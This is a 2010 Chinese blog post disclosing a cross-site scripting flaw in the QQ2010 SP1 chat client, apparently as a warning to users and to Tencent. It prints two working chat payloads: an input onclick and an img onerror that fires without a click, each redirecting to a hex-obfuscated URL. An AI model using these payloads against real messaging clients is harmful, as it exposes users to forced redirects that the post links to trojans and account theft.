首頁 > 电脑软件 > 不要使用QQ腾讯2010SP1,有严重的安全漏洞

不要使用QQ腾讯2010SP1,有严重的安全漏洞

2010年7月28日 發表評論 閱讀評論

QQ2010 SP1 会自动打开网页,可能会造成中木马,QQ号被盗取,等等

 

 

腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。
首先囧一下:脚本出错还会提示错误

image
1、消息记录的Javascript、Html标签没有屏蔽
image
2、消息盒子Javascript、Html标签没有屏蔽
image
3、小实验
1、发送代码:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
因为腾讯会自动将url转换,我们必须混淆url才能发送
image
image
image
4、超牛代码
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
因为要点击才能触发,想到一个不用点击就能触发的代码。
5、希望腾讯快点修复,这个漏洞非同小可
6、本漏洞由TGL发现。

原创文章,转载请注明: 转载自kchx的博客

本文链接地址: 不要使用QQ腾讯2010SP1,有严重的安全漏洞

Categories: 电脑软件 Tags: ,
  1. 目前尚無任何的評論。
  1. 目前尚無任何 trackbacks 和 pingbacks。